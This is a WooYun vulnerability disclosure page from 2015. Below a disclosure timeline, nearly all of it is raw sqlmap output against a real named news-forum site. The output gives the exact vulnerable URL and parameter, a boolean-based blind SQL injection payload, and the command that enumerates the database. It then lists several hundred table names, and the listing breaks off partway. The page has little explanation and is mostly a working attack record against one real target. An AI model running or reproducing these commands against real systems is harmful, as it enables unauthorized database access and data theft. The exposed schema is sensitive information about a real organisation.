WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
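2015-09-14: Details reported to the vendor; awaiting vendor handling
2015-09-15: Vendor confirmed; details disclosed to the vendor only
2015-09-25: Details disclosed to core white hats and experts in related fields
2015-10-05: Details disclosed to regular white hats
2015-10-15: Details disclosed to intern white hats
2015-10-30: Details disclosed to the public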
RT
root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:39:56[14:39:56] [INFO] resuming back-end DBMS 'mysql' [14:39:56] [INFO] testing connection to the target URL[14:39:57] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB---[14:39:57] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL 5[14:39:57] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'[*] shutting down at 14:39:57root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656 --tables -D ultrax3 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:40:11[14:40:11] [INFO] resuming back-end DBMS 'mysql' [14:40:11] [INFO] testing connection to the target URL[14:40:13] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB---[14:40:13] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL 5[14:40:13] [INFO] fetching tables for database: 'ultrax3'[14:40:13] [INFO] fetching number of tables for database 'ultrax3'[14:40:13] [INFO] resumed: 480[14:40:13] [INFO] resumed: always_on_topbottom[14:40:13] [INFO] resumed: fifth[14:40:13] [INFO] resumed: first[14:40:13] [INFO] resumed: formula[14:40:13] [INFO] resumed: forum_rank[14:40:13] [INFO] resumed: fourth[14:40:13] [INFO] resumed: ggl_main[14:40:13] [INFO] resumed: ggl_result[14:40:13] [INFO] resumed: ggl_shidaicheng[14:40:13] [INFO] resumed: gjj[14:40:13] [INFO] resumed: guagua[14:40:13] [INFO] resumed: guagua_1[14:40:13] [INFO] resumed: guagua_7080[14:40:13] [INFO] resumed: house_1024[14:40:13] [INFO] resumed: house_2048[14:40:13] [INFO] resumed: huodong[14:40:13] [INFO] resumed: huodong_xg[14:40:13] [INFO] resumed: kl3w_guise_idlog[14:40:13] [INFO] resumed: map[14:40:13] [INFO] resumed: map_content[14:40:13] [INFO] resumed: marqueedraw_main[14:40:13] [INFO] resumed: marqueedraw_result[14:40:13] [INFO] resumed: pay_scan_content[14:40:13] [INFO] resumed: pay_scan_log[14:40:13] [INFO] resumed: permit[14:40:13] [INFO] resumed: post[14:40:13] [INFO] resumed: pre_baidusubmit_setting[14:40:13] [INFO] resumed: pre_baidusubmit_sitemap[14:40:13] [INFO] resumed: pre_baidusubmit_urlstat[14:40:13] [INFO] resumed: pre_benevolence_7ree[14:40:13] [INFO] resumed: 
pre_board_count[14:40:13] [INFO] resumed: pre_codejm_denglu_bindinfo[14:40:13] [INFO] resumed: pre_common_addon[14:40:13] [INFO] resumed: pre_common_admincp_cmenu[14:40:13] [INFO] resumed: pre_common_admincp_group[14:40:13] [INFO] resumed: pre_common_admincp_member[14:40:13] [INFO] resumed: pre_common_admincp_perm[14:40:13] [INFO] resumed: pre_common_admincp_session[14:40:13] [INFO] resumed: pre_common_admingroup[14:40:13] [INFO] resumed: pre_common_adminnote[14:40:13] [INFO] resumed: pre_common_advertisement[14:40:13] [INFO] resumed: pre_common_advertisement_custom[14:40:13] [INFO] resumed: pre_common_analyse[14:40:13] [INFO] resumed: pre_common_banned[14:40:13] [INFO] resumed: pre_common_block[14:40:13] [INFO] resumed: pre_common_block_favorite[14:40:13] [INFO] resumed: pre_common_block_item[14:40:13] [INFO] resumed: pre_common_block_item_data[14:40:13] [INFO] resumed: pre_common_block_permission[14:40:13] [INFO] resumed: pre_common_block_pic[14:40:13] [INFO] resumed: pre_common_block_style[14:40:13] [INFO] resumed: pre_common_block_xml[14:40:13] [INFO] resumed: pre_common_cache[14:40:13] [INFO] resumed: pre_common_card[14:40:13] [INFO] resumed: pre_common_card_log[14:40:13] [INFO] resumed: pre_common_card_type[14:40:13] [INFO] resumed: pre_common_connect_guest[14:40:13] [INFO] resumed: pre_common_credit_log[14:40:13] [INFO] resumed: pre_common_credit_log_field[14:40:13] [INFO] resumed: pre_common_credit_rule[14:40:13] [INFO] resumed: pre_common_credit_rule_log[14:40:13] [INFO] resumed: pre_common_credit_rule_log_field[14:40:13] [INFO] resumed: pre_common_cron[14:40:13] [INFO] resumed: pre_common_devicetoken[14:40:13] [INFO] resumed: pre_common_district[14:40:13] [INFO] resumed: pre_common_diy_data[14:40:13] [INFO] resumed: pre_common_domain[14:40:13] [INFO] resumed: pre_common_failedip[14:40:13] [INFO] resumed: pre_common_failedlogin[14:40:13] [INFO] resumed: pre_common_friendlink[14:40:13] [INFO] resumed: pre_common_grouppm[14:40:13] [INFO] resumed: 
pre_common_hot[14:40:13] [INFO] resumed: pre_common_invite[14:40:13] [INFO] resumed: pre_common_magic[14:40:13] [INFO] resumed: pre_common_magiclog[14:40:13] [INFO] resumed: pre_common_mailcron[14:40:13] [INFO] resumed: pre_common_mailqueue[14:40:13] [INFO] resumed: pre_common_member[14:40:13] [INFO] resumed: pre_common_member_action_log[14:40:13] [INFO] resumed: pre_common_member_archive[14:40:13] [INFO] resumed: pre_common_member_connect[14:40:13] [INFO] resumed: pre_common_member_count[14:40:13] [INFO] resumed: pre_common_member_count_archive[14:40:13] [INFO] resumed: pre_common_member_crime[14:40:13] [INFO] resumed: pre_common_member_field_forum[14:40:13] [INFO] resumed: pre_common_member_field_forum_archive[14:40:13] [INFO] resumed: pre_common_member_field_home[14:40:13] [INFO] resumed: pre_common_member_field_home_archive[14:40:13] [INFO] resumed: pre_common_member_forum_buylog[14:40:13] [INFO] resumed: pre_common_member_grouppm[14:40:13] [INFO] resumed: pre_common_member_log[14:40:13] [INFO] resumed: pre_common_member_magic[14:40:13] [INFO] resumed: pre_common_member_medal[14:40:13] [INFO] resumed: pre_common_member_newprompt[14:40:13] [INFO] resumed: pre_common_member_profile[14:40:13] [INFO] resumed: pre_common_member_profile_archive[14:40:13] [INFO] resumed: pre_common_member_profile_setting[14:40:13] [INFO] resumed: pre_common_member_security[14:40:13] [INFO] resumed: pre_common_member_secwhite[14:40:13] [INFO] resumed: pre_common_member_stat_field[14:40:13] [INFO] resumed: pre_common_member_stat_fieldcache[14:40:13] [INFO] resumed: pre_common_member_stat_search[14:40:13] [INFO] resumed: pre_common_member_stat_searchcache[14:40:13] [INFO] resumed: pre_common_member_status[14:40:13] [INFO] resumed: pre_common_member_status_archive[14:40:13] [INFO] resumed: pre_common_member_validate[14:40:13] [INFO] resumed: pre_common_member_verify[14:40:13] [INFO] resumed: pre_common_member_verify_info[14:40:13] [INFO] resumed: pre_common_member_wechat[14:40:13] [INFO] 
resumed: pre_common_member_wechatmp[14:40:13] [INFO] resumed: pre_common_moderate[14:40:13] [INFO] resumed: pre_common_myapp[14:40:13] [INFO] resumed: pre_common_myinvite[14:40:13] [INFO] resumed: pre_common_mytask[14:40:13] [INFO] resumed: pre_common_nav[14:40:13] [INFO] resumed: pre_common_onlinetime[14:40:13] [INFO] resumed: pre_common_optimizer[14:40:13] [INFO] resumed: pre_common_patch[14:40:13] [INFO] resumed: pre_common_plugin[14:40:13] [INFO] resumed: pre_common_pluginvar[14:40:13] [INFO] resumed: pre_common_process[14:40:13] [INFO] resumed: pre_common_regip[14:40:13] [INFO] resumed: pre_common_relatedlink[14:40:13] [INFO] resumed: pre_common_remote_port[14:40:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:40:13] [INFO] retrieved: pre_common_report[14:40:23] [INFO] retrieved: pre_common_searchindex[14:40:33] [INFO] retrieved: pre_common_seccheck[14:40:41] [INFO] retrieved: pre_common_secquestion[14:40:55] [INFO] retrieved: pre_common_session[14:40:59] [INFO] retrieved: pre_common_setting[14:41:03] [INFO] retrieved: pre_common_smiley[14:41:06] [INFO] retrieved: pre_common_sphinxcounter[14:41:20] [INFO] retrieved: pre_common_stat[14:41:22] [INFO] retrieved: pre_common_statuser[14:41:25] [INFO] retrieved: pre_common_style[14:41:28] [INFO] retrieved: pre_common_stylevar[14:41:31] [INFO] retrieved: pre_common_syscache[14:41:38] [INFO] retrieved: pre_common_tag[14:41:43] [INFO] retrieved: pre_common_tagitem[14:41:48] [INFO] retrieved: pre_common_task[14:41:51] [INFO] retrieved: pre_common_taskvar[14:41:54] [INFO] retrieved: pre_common_template[14:42:02] [INFO] retrieved: pre_common_template_block[14:42:07] [INFO] retrieved: pre_common_template_permission[14:42:13] [INFO] retrieved: pre_common_uin_black[14:42:19] [INFO] retrieved: pre_common_usergroup[14:42:26] [INFO] retrieved: pre_common_usergroup_field[14:42:32] [INFO] retrieved: pre_common_visit[14:42:35] [INFO] retrieved: 
pre_common_word[14:42:38] [INFO] retrieved: pre_common_word_type[14:42:45] [INFO] retrieved: pre_connect_disktask[14:42:55] [INFO] retrieved: pre_connect_feedlog[14:43:04] [INFO] retrieved: pre_connect_memberbindlog[14:43:11] [INFO] retrieved: pre_connect_postfeedlog[14:43:16] [INFO] retrieved: pre_connect_tthreadlog[14:43:22] [INFO] retrieved: pre_dsu_paulsign[14:43:34] [INFO] retrieved: pre_dsu_paulsignemot[14:43:44] [INFO] retrieved: pre_dsu_paulsignset[14:43:52] [INFO] retrieved: pre_dzp[14:43:54] [INFO] retrieved: pre_dzp_jp[14:43:56] [INFO] retrieved: pre_forum_access[14:44:04] [INFO] retrieved: pre_forum_activity[14:44:08] [INFO] retrieved: pre_forum_activityapply[14:44:18] [INFO] retrieved: pre_forum_announcement[14:44:33] [INFO] retrieved: pre_forum_attachment[14:44:41] [INFO] retrieved: pre_forum_attachment_0[14:44:44] [INFO] retrieved: pre_forum_attachment_1[14:44:49] [INFO] retrieved: pre_forum_attachment_2[14:44:52] [INFO] retrieved: pre_forum_attachment_3[14:44:54] [INFO] retrieved: pre_forum_attachment_4[14:44:59] [INFO] retrieved: pre_forum_attachment_5[14:45:01] [INFO] retrieved: pre_forum_attachment_6[14:45:04] [INFO] retrieved: pre_forum_attachment_7[14:45:06] [INFO] retrieved: pre_forum_attachment_8[14:45:08] [INFO] retrieved: pre_forum_attachment_9[14:45:13] [INFO] retrieved: pre_forum_attachment_exif[14:45:20] [INFO] retrieved: pre_forum_attachment_unused[14:45:25] [INFO] retrieved: pre_forum_attachtype[14:45:31] [INFO] retrieved: pre_forum_bbcode[14:45:37] [INFO] retrieved: pre_forum_collection[14:45:43] [INFO] retrieved: pre_forum_collectioncomment[14:45:51] [INFO] retrieved: pre_forum_collectionfollow[14:46:04] [INFO] retrieved: pre_forum_collectioninvite[14:46:12] [INFO] retrieved: pre_forum_collectionrelated[14:46:20] [INFO] retrieved: pre_forum_collectionteamworker[14:46:29] [INFO] retrieved: pre_forum_collectionthread[14:46:39] [INFO] retrieved: pre_forum_creditslog[14:46:47] [INFO] retrieved: pre_forum_debate[14:47:02] [INFO] 
retrieved: pre_forum_debatepost[14:47:06] [INFO] retrieved: pre_forum_faq[14:47:11] [INFO] retrieved: pre_forum_filter_post[14:47:19] [INFO] retrieved: pre_forum_forum[14:47:22] [INFO] retrieved: pre_forum_forum_threadtable[14:47:31] [INFO] retrieved: pre_forum_forumfield[14:47:34] [INFO] retrieved: pre_forum_forumrecommend[14:47:43] [INFO] retrieved: pre_forum_groupcreditslog[14:47:57] [INFO] retrieved: pre_forum_groupfield[14:48:03] [INFO] retrieved: pre_forum_groupinvite[14:48:13] [INFO] retrieved: pre_forum_grouplevel[14:48:20] [INFO] retrieved: pre_forum_groupranking[14:48:34] [INFO] retrieved: pre_forum_groupuser[14:48:40] [INFO] retrieved: pre_forum_hotreply_member[14:48:51] [INFO] retrieved: pre_forum_hotreply_number[14:49:02] [INFO] retrieved: pre_forum_imagetype[14:49:12] [INFO] retrieved: pre_forum_medal[14:49:21] [INFO] retrieved: pre_forum_medallog[14:49:24] [INFO] retrieved: pre_forum_memberrecommend[14:49:36] [INFO] retrieved: pre_forum_moderator[14:49:43] [INFO] retrieved: pre_forum_modwork[14:49:55] [INFO] retrieved: pre_forum_newthread[14:50:12] [INFO] retrieved: pre_forum_onlinelist[14:50:18] [INFO] retrieved: pre_forum_optionvalue9[14:50:32] [INFO] retrieved: pre_forum_order[14:50:36] [INFO] retrieved: pre_forum_poll[14:50:45] [INFO] retrieved: pre_forum_polloption[14:50:52] [INFO] retrieved: pre_forum_polloption_image[14:50:59] [INFO] retrieved: pre_forum_pollvoter[14:51:05] [INFO] retrieved: pre_forum_post[14:51:07] [INFO] retrieved: pre_forum_post_1[14:51:13] [INFO] retrieved: pre_forum_post_2[14:51:18] [INFO] retrieved: pre_forum_post_3[14:51:22] [INFO] retrieved: pre_forum_post_4[14:51:24] [INFO] retrieved: pre_forum_post_5[14:51:29] [INFO] retrieved: pre_forum_post_6[14:51:31] [INFO] retrieved: pre_forum_post_7[14:51:33] [INFO] retrieved: pre_forum_post_location[14:51:41] [INFO] retrieved: pre_forum_post_moderate[14:51:54] [INFO] retrieved: pre_forum_post_tableid[14:52:10] [INFO] retrieved: pre_forum_postcache[14:52:20] [INFO] retrieved: 
pre_forum_postcomment[14:52:27] [INFO] retrieved: pre_forum_postlog[14:52:32] [INFO] retrieved: pre_forum_postposition[14:52:46] [INFO] retrieved: pre_forum_poststick[14:52:50] [INFO] retrieved: pre_forum_promotion[14:53:01] [INFO] retrieved: pre_forum_ratelog[14:53:14] [INFO] retrieved: pre_forum_relatedthread[14:53:32] [INFO] retrieved: pre_forum_replycredit[14:53:44] [INFO] retrieved: pre_forum_rsscache[14:54:01] [INFO] retrieved: pre_forum_sofa[14:54:04] [INFO] retrieved: pre_forum_spacecache[14:54:18] [INFO] retrieved: pre_forum_statlog[14:54:28] [INFO] retrieved: pre_forum_thread[14:54:38] [INFO] retrieved: pre_forum_thread_bak_20150910[14:54:51] [INFO] retrieved: pre_forum_thread_moderate[14:54:59] [INFO] retrieved: pre_forum_threadaddviews[14:55:07] [INFO] retrieved: pre_forum_threadcalendar[14:55:13] [INFO] retrieved: pre_forum_threadclass[14:55:17] [INFO] retrieved: pre_forum_threadclosed[14:55:24] [INFO] retrieved: pre_forum_threaddisablepos[14:55:39] [INFO] retrieved: pre_forum_threadhidelog[14:55:53] [INFO] retrieved: pre_forum_threadhot[14:56:02] [INFO] retrieved: pre_forum_threadimage[14:56:08] [INFO] retrieved: pre_forum_threadlog[14:56:11] [INFO] retrieved: pre_forum_threadmod[14:56:17] [INFO] retrieved: pre_forum_threadpartake[14:56:30] [INFO] retrieved: pre_forum_threadpreview[14:56:38] [INFO] retrieved: pre_forum_threadprofile[14:56:50] [INFO] retrieved: pre_forum_threadprofile_group[14:57:01] [INFO] retrieved: pre_forum_threadrush[14:57:08] [INFO] retrieved: pre_forum_threadtype[14:57:17] [INFO] retrieved: pre_forum_trade[14:57:19] [INFO] retrieved: pre_forum_tradecomment[14:57:24] [INFO] retrieved: pre_forum_tradelog[14:57:34] [INFO] retrieved: pre_forum_typeoption[14:57:45] [INFO] retrieved: pre_forum_typeoptionvar[14:57:52] [INFO] retrieved: pre_forum_typevar[14:58:01] [INFO] retrieved: pre_forum_warning[14:58:08] [INFO] retrieved: pre_home_album[14:58:16] [INFO] retrieved: pre_home_album_category[14:58:29] [INFO] retrieved: 
pre_home_appcreditlog[14:58:41] [INFO] retrieved: pre_home_blacklist[14:58:58] [INFO] retrieved: pre_home_blog[14:59:04] [INFO] retrieved: pre_home_blog_category[14:59:18] [INFO] retrieved: pre_home_blog_moderate[14:59:35] [INFO] retrieved: pre_home_blogfield[14:59:38] [INFO] retrieved: pre_home_class[14:59:48] [INFO] retrieved: pre_home_click[15:00:00] [INFO] retrieved: pre_home_clickuser[15:00:05] [INFO] retrieved: pre_home_comment[15:00:12] [INFO] retrieved: pre_home_comment_moderate[15:00:24] [INFO] retrieved: pre_home_docomment[15:00:29] [INFO] retrieved: pre_home_doing[15:00:34] [INFO] retrieved: pre_home_doing_moderate[15:00:48] [INFO] retrieved: pre_home_favorite[15:01:06] [INFO] retrieved: pre_home_feed[15:01:14] [INFO] retrieved: pre_home_feed_app[15:01:20] [INFO] retrieved: pre_home_follow[15:01:27] [INFO] retrieved: pre_home_follow_feed[15:01:30] [INFO] retrieved: pre_home_follow_feed_archiver[15:01:51] [INFO] retrieved: pre_home_friend[15:01:57] [INFO] retrieved: pre_home_friend_request[15:02:11] [INFO] retrieved: pre_home_friendlog[15:02:23] [INFO] retrieved: pre_home_notification[15:02:39] [INFO] retrieved: pre_home_pic[15:02:44] [INFO] retrieved: pre_home_pic_moderate[15:02:59] [INFO] retrieved: pre_home_picfield[15:03:02] [INFO] retrieved: pre_home_poke[15:03:14] [INFO] retrieved: pre_home_pokearchive[15:03:21] [INFO] retrieved: pre_home_share[15:03:33] [INFO] retrieved: pre_home_share_moderate[15:03:45] [INFO] retrieved: pre_home_show[15:03:50] [INFO] retrieved: pre_home_specialuser[15:04:11] [INFO] retrieved: pre_home_userapp[15:04:21] [INFO] retrieved: pre_home_userappfield[15:04:27] [INFO] retrieved: pre_home_visitor[15:04:34] [INFO] retrieved: pre_hux_wx[15:04:40] [INFO] retrieved: pre_hux_wx_action[15:04:51] [INFO] retrieved: pre_hux_wx_config[15:04:58] [INFO] retrieved: pre_hux_wx_userjp[15:05:04] [INFO] retrieved: pre_inner_page[15:05:17] [INFO] retrieved: pre_inner_page_config[15:05:23] [INFO] retrieved: pre_innermember[15:05:37] [INFO] 
retrieved: pre_innertopic_stat[15:05:52] [INFO] retrieved: pre_k_spider[15:05:59] [INFO] retrieved: pre_mobile_setting[15:06:16] [INFO] retrieved: pre_mobile_wechat_authcode[15:06:32] [INFO] retrieved: pre_mobile_wechat_masssend[15:06:48] [INFO] retrieved: pre_mobile_wechat_resource[15:06:56] [INFO] retrieved: pre_mobile_wsq_threadlist[15:07:11] [INFO] retrieved: pre_mobileoem_member[15:07:19] [INFO] retrieved: pre_mobileoem_pushthreads[15:07:29] [INFO] retrieved: pre_moder_rank[15:07:36] [INFO] retrieved: pre_myrepeats[15:07:43] [INFO] retrieved: pre_nayuan_report_component[15:08:06] [INFO] retrieved: pre_plugin_auction[15:08:28] [INFO] retrieved: pre_plugin_auction_message[15:08:43] [INFO] retrieved: pre_plugin_auction_xml[15:08:49] [INFO] retrieved: pre_plugin_auctionapply[15:09:03] [INFO] retrieved: pre_plugin_autoreply_member[15:09:26] [INFO] retrieved: pre_plugin_autoreply_thread[15:09:37] [INFO] retrieved: pre_plugin_banklist[15:09:45] [INFO] retrieved: pre_plugin_banklog[15:09:50] [INFO] retrieved: pre_plugin_bankoperation[15:10:03] [INFO] retrieved: pre_plugin_monthmoney[15:10:12] [INFO] retrieved: pre_portal_article_content[15:10:49] [INFO] retrieved: pre_portal_article_count[15:11:02] [INFO] retrieved: pre_portal_article_moderate[15:11:13] [INFO] retrieved: pre_portal_article_related[15:11:27] [INFO] retrieved: pre_portal_article_title[15:11:36] [INFO] retrieved: pre_portal_article_trash[15:11:39] [INFO] retrieved: pre_portal_attachment[15:11:56] [INFO] retrieved: pre_portal_category[15:12:10] [INFO] retrieved: pre_portal_category_permission[15:12:26] [INFO] retrieved: pre_portal_comment[15:12:30] [INFO] retrieved: pre_portal_comment_moderate[15:12:41] [INFO] retrieved: pre_portal_rsscache[15:12:48] [INFO] retrieved: pre_portal_topic[15:13:03] [INFO] retrieved: pre_portal_topic_pic[15:13:19] [INFO] retrieved: pre_post_count[15:13:26] [INFO] retrieved: pre_security_evilpost[15:13:37] [INFO] retrieved: pre_security_eviluser[15:13:47] [INFO] retrieved: 
pre_security_failedlog[15:14:02] [INFO] retrieved: pre_tujoin_copyright[15:14:22] [INFO] retrieved: pre_ucenter_admins[15:14:44] [INFO] retrieved: pre_ucenter_applications[15:15:00] [INFO] retrieved: pre_ucenter_badwords[15:15:19] [INFO] retrieved: pre_ucenter_domains[15:15:26] [INFO] retrieved: pre_ucenter_failedlogins[15:15:39] [INFO] retrieved: pre_ucenter_feeds[15:15:49] [INFO] retrieved: pre_ucenter_friends[15:16:00] [INFO] retrieved: pre_ucenter_mailqueue[15:16:29] [INFO] retrieved: pre_ucenter_memberfields[15:16:46] [INFO] retrieved: pre_ucenter_members[15:16:51] [INFO] retrieved: pre_ucenter_mergemembers[15:17:13] [INFO] retrieved: pre_ucenter_newpm[15:17:29] [INFO] retrieved: pre_ucenter_notelist[15:17:43] [INFO] retrieved: pre_ucenter_pm_indexes[15:17:58] [INFO] retrieved: pre_ucenter_pm_lists[15:18:05] [INFO] retrieved: pre_ucenter_pm_members[15:18:14] [INFO] retrieved: pre_ucenter_pm_messages_0[15:18:29] [INFO] retrieved: pre_ucenter_pm_messages_1[15:18:33] [INFO] retrieved: pre_ucenter_pm_messages_2[15:18:39] [INFO] retrieved: pre_ucenter_pm_messages_3[15:18:42] [INFO] retrieved: pre_ucenter_pm_messages_4[15:18:47] [INFO] retrieved: pre_ucenter_pm_messages_5[15:18:53] [INFO] retrieved: pre_ucenter_pm_messages_6[15:19:01] [INFO] retrieved: pre_ucenter_pm_messages_7[15:19:08] [INFO] retrieved: pre_ucenter_pm_messages_8[15:19:12] [INFO] retrieved: pre_ucenter_pm_messages_9[15:19:24] [INFO] retrieved: pre_ucenter_protectedmembers[15:19:47] [INFO] retrieved: pre_ucenter_settings[15:20:03] [INFO] retrieved: pre_ucenter_sqlcache[15:20:10] [INFO] retrieved: pre_ucenter_tags[15:20:23] [INFO] retrieved: pre_ucenter_vars[15:20:29] [INFO] retrieved: pre_wuxin_findyou[15:20:47] [INFO] retrieved: pre_wz_postvisitors[15:21:02] [INFO] retrieved: qdfangchan[15:21:16] [INFO] retrieved: reg[15:21:23] [INFO] retrieved: stat_mod[15:21:33] [INFO] retrieved: sys_auth[15:21:45] [INFO] retrieved: sys_log[15:21:47] [INFO] retrieved: sys_menu[15:21:53] [INFO] retrieved: 
sys_per[15:21:58] [INFO] retrieved: sys_user[15:22:03] [INFO] retrieved: tem_log[15:22:13] [INFO] retrieved: tem_vote[15:22:15] [INFO] retrieved: third[15:22:24] [INFO] retrieved: vote_activity[15:22:46] [INFO] retrieved: vote_log[15:22:54] [INFO] retrieved: vote_rule[15:23:02] [INFO] retrieved: vote_works[15:23:14] [INFO] retrieved: vote_wxr[15:23:19] [INFO] retrieved: weixin2014[15:23:36] [INFO] retrieved: weixin_2[15:23:46] [INFO] retrieved: wx_alipay_orderlist[15:24:10] [INFO] retrieved: wx_annaxi[15:24:16] [INFO] retrieved: wx_annaxi_book[15:24:22] [INFO] retrieved: wx_annaxi_user[15:24:28] [INFO] retrieved: wx_cailou[15:24:34] [INFO] retrieved: wx_fm[15:24:38] [INFO] retrieved: wx_ggl_haibo[15:24:46] [INFO] retrieved: wx_ggl_haibo_jp[15:24:49] [INFO] retrieved: wx_ggl_share[15:25:02] [INFO] retrieved: wx_ggl_text[15:25:06] [INFO] retrieved: wx_heda_book[15:25:25] [INFO] retrieved: wx_house_xnyw[15:25:31] [INFO] retrieved: wx_house_yao[15:25:39] [INFO] retrieved: wx_huodong_shake[15:26:00] [INFO] retrieved: wx_jiaju_home_cate[15:26:23] [INFO] retrieved: wx_jiaju_home_copy[15:26:29] [INFO] retrieved: wx_jiaju_home_pic[15:26:38] [INFO] retrieved: wx_jiaju_homes[15:26:39] [INFO] retrieved: wx_level[15:26:41] [INFO] retrieved: wx_lvhua[15:26:53] [INFO] retrieved: wx_lvhua_zan[15:26:58] [INFO] retrieved: wx_qingren[15:27:05] [INFO] retrieved: wx_villa[15:27:08] [INFO] retrieved: wx_weather[15:27:26] [INFO] retrieved: wx_wxpay[15:27:39] [INFO] retrieved: wx_wxpay_bm[15:27:41] [INFO] retrieved: wx_wxpay_code[15:27:47] [INFO] retrieved: wx_wxpay_code_zhgj[15:27:53] [INFO] retrieved: wx_wxpay_codeid_sm1[15:27:57] [INFO] retrieved: wx_wxpay_liqun[15:28:10] [INFO] retrieved: wx_wxpay_liqun_pecode[15:28:23] [INFO] retrieved: wx_wxpay_liqun_sm[15:28:25] [INFO] retrieved: wx_wxpay_notice[15:28:36] [INFO] retrieved: wx_wxpay_orderlist[15:28:51] [INFO] retrieved: wx_wxpay_orderlist_jiaju[15:29:01] [INFO] retrieved: wx_wxpay_orderlist_sm[15:29:07] [INFO] retrieved: 
wx_wxpay_orderlist_zhgj[15:29:14] [INFO] retrieved: wx_wxpay_right[15:29:23] [INFO] retrieved: wx_wxpay_tmh[15:29:35] [INFO] retrieved: wx_wxpay_tmh_user[15:29:42] [INFO] retrieved: wx_wxpay_tran_sm[15:29:55] [INFO] retrieved: wx_wxpay_user[15:30:04] [INFO] retrieved: wx_wxpay_user_jiaju[15:30:17] [INFO] retrieved: wx_wxpay_user_sm[15:30:23] [INFO] retrieved: wx_wxpay_user_zhgj[15:30:38] [INFO] retrieved: wx_yuhai_book[15:30:49] [INFO] retrieved: wxl_admin[15:30:58] [INFO] retrieved: wxl_life[15:31:01] [INFO] retrieved: wxl_lroom[15:31:06] [INFO] retrieved: wxl_lroom_order[15:31:16] [INFO] retrieved: wxl_lroom_route[15:31:28] [INFO] retrieved: wxl_member[15:31:34] [INFO] retrieved: wxl_mesboard[15:31:40] [INFO] retrieved: wxl_module[15:31:46] [INFO] retrieved: wxl_picture[15:31:56] [INFO] retrieved: wxl_picture_active[15:32:04] [INFO] retrieved: wxl_picture_config[15:32:20] [INFO] retrieved: wxl_picture_engin[15:32:44] [INFO] retrieved: wxl_picture_proto[15:32:51] [INFO] retrieved: wxl_uppic[15:32:57] [INFO] retrieved: wxl_vote[15:33:07] [INFO] retrieved: wxl_vote_rate[15:33:12] [INFO] retrieved: wxl_wechat[15:33:28] [INFO] retrieved: wydc[15:33:32] [INFO] retrieved: xk_baseconfig[15:33:44] [INFO] retrieved: xk_spider_job[15:33:59] [INFO] retrieved: xk_spider_job_later[15:34:09] [INFO] retrieved: xk_spider_url[15:34:24] [INFO] retrieved: xk_statiq[15:34:42] [INFO] retrieved: [15:34:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[15:34:42] [INFO] retrieved: yz_build[15:34:56] [INFO] retrieved: yz_owner[15:35:01] [INFO] retrieved: yz_owner_his[15:35:03] [INFO] retrieved: yz_owner_invites[15:35:08] [INFO] retrieved: zp_main[15:35:12] [INFO] retrieved: zp_resultDatabase: ultrax3[479 tables]+---------------------------------------+| first || always_on_topbottom || fifth || formula || forum_rank || fourth || ggl_main || ggl_result || ggl_shidaicheng || gjj || guagua || guagua_1 || guagua_7080 || 
house_1024 || house_2048 || huodong || huodong_xg || kl3w_guise_idlog || map || map_content || marqueedraw_main || marqueedraw_result || pay_scan_content || pay_scan_log || permit || post || pre_baidusubmit_setting || pre_baidusubmit_sitemap || pre_baidusubmit_urlstat || pre_benevolence_7ree || pre_board_count || pre_codejm_denglu_bindinfo || pre_common_addon || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_analyse || pre_common_banned || pre_common_block || pre_common_block_favorite || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_pic || pre_common_block_style || pre_common_block_xml || pre_common_cache || pre_common_card || pre_common_card_log || pre_common_card_type || pre_common_connect_guest || pre_common_credit_log || pre_common_credit_log_field || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_devicetoken || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedip || pre_common_failedlogin || pre_common_friendlink || pre_common_grouppm || pre_common_hot || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_action_log || pre_common_member_archive || pre_common_member_connect || pre_common_member_count || pre_common_member_count_archive || pre_common_member_crime || pre_common_member_field_forum || pre_common_member_field_forum_archive || pre_common_member_field_home || pre_common_member_field_home_archive || pre_common_member_forum_buylog || pre_common_member_grouppm || pre_common_member_log || pre_common_member_magic || pre_common_member_medal || pre_common_member_newprompt || 
